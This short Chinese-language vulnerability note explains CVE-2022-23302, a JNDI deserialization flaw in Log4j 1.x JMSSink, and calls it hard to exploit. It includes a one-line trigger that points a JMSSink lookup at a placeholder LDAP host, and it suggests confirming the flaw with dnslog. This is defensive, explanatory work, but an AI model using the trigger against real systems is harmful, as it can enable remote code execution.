为了完整性,简要的写一下当一个记录,这个原理十分简单
0x01 正文 漏洞说明当攻击者具有修改Log4j配置的权限或配置引用了攻击者有权访问的LDAP服务时,Log4j1.x所有版本中的JMSSink 都容易受到不可信数据的反序列化。攻击者可以提供一个TopicConnectionFactoryBindingName配置,利用JMSSink执行JNDI请求,从而以与CVE-2021-4104类似的方式远程执行代码。
漏洞利用CVE-2021-4104众所周知是一个比较鸡肋的漏洞,而CVE-2022-23302同样是一个非常鸡肋的漏洞
暂时还未发现直接通过配置文件来进行触发,可能是因为对配置文件规则不熟悉,不过可以通过以下方式进行模拟
JMSSink jmsSink=new JMSSink("ldap://a","a","a","a");
漏洞分析
在JMSSink构造方法中,会去调用lookup
lookup回去调用protected方法,从而触发ctxlookup方法导致最后存在反序列化漏洞,当然如果利用的话,还是需要存在本地的可调用链,可通过dnslog来进行
以上
